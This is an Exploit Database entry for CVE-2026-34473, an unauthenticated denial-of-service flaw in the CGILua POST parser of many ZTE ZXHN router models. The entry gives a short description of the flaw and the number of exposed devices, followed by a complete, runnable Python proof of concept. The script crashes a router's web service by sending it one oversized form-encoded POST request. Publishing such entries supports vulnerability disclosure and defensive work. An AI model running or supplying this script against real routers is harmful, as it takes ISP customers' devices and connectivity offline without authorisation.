This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING ZTE Routers - Unauthenticated Denial of Service EDB-ID: 52594 CVE: 2026-34473 EDB Verified: Author: MINA NAGEH SALALMA Type: LOCAL Exploit: / Platform: MULTIPLE Date: 2026-05-29 Vulnerable App: # Exploit Title: ZTE Routers - Unauthenticated Denial of Service # Date: 2026-05-20 # Exploit Author: Mina Nageh Salalma (Monx Research) # Vendor Homepage: https://www.zte.com.cn # Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers # Version: Multiple ZTE router models (17+ confirmed) # Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed devices # CVE: CVE-2026-34473 # Description: # The CGILua post.lua parser in 17+ ZTE router models does not enforce a # maximum body size for application/x-www-form-urlencoded POST requests. # An unauthenticated attacker can crash or freeze the router's web service # by sending a single oversized POST request to any CGI endpoint. # No authentication, session, or credentials are required. # # Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide. # Estimated 140,000+ publicly reachable devices at time of research. # # MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473 # PoC (Python 3) import requests import sys def dos_exploit(target, size_kb=256): """ CVE-2026-34473 - Unauthenticated DoS Sends oversized POST body to crash ZTE CGILua web service. """ url = f"http://{target}/cgi-bin/luci" payload = "a=" + "A" * (size_kb * 1024) headers = {"Content-Type": "application/x-www-form-urlencoded"} try: r = requests.post(url, data=payload, headers=headers, timeout=15) print(f"[+] {target} responded with HTTP {r.status_code} (device may still be up)") except requests.exceptions.ConnectionError: print(f"[!] {target} - Connection refused or dropped: device web service likely crashed (DoS successful)") except requests.exceptions.Timeout: print(f"[!] {target} - Timeout: device web service unresponsive (DoS successful)") except Exception as e: print(f"[-] {target}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: poc.py <target_ip> [payload_size_kb]") sys.exit(1) size = int(sys.argv[2]) if len(sys.argv) > 2 else 256 dos_exploit(sys.argv[1], size) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.